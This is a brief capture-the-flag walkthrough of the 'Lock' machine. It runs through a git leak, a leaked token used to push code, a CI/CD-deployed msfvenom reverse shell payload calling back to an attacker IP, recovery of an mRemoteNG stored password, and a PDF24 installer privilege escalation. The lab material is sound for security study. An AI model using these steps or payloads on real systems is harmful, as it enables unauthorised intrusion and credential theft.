Lock (easy)

port scan

web discover

we have git leak

but return 403

gitea discover

use git log -p to dump all diff. We found a token 43ce39bb0bd6bc489284f2905f033ca467a6362f

worked !

get a shell

we have website.git

we can use git clone $token@$target_repo format to clone repo

ci/cd is enable which mean we can change this repo and get shell via ci/cd

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.1.167 LPORT=80 -f aspx -o shell.aspx

add shell.aspx to project directory

just push our evil code to remote repo

use curl command ang we get a shell!

git add .
git commit -m 'update shell console to dev'
git push -u origin main

runas Gale.Dekarios

there have some creds

there have Gale.Dekarios user encrypt password in config.xml

so this is something called mRemoteNG

now we have plaintext password

we can use this password rdp into target

Privilege Escalation

because there have a software called PDF24

google!

this exploit seems must use installed.msi. so we have to find a msi file called pdf24-creator-11.14.0-x64.msi

got it!

build tool

wait sometime

we have system cmd!

just follow the post, our target is open web browser

select legacy console model

don't select edge. seems edge can't run on this windows version. it doesn't pop up edge

we launch system firefox web browser

firefox open file Ctrl + O

we get system cmd shell !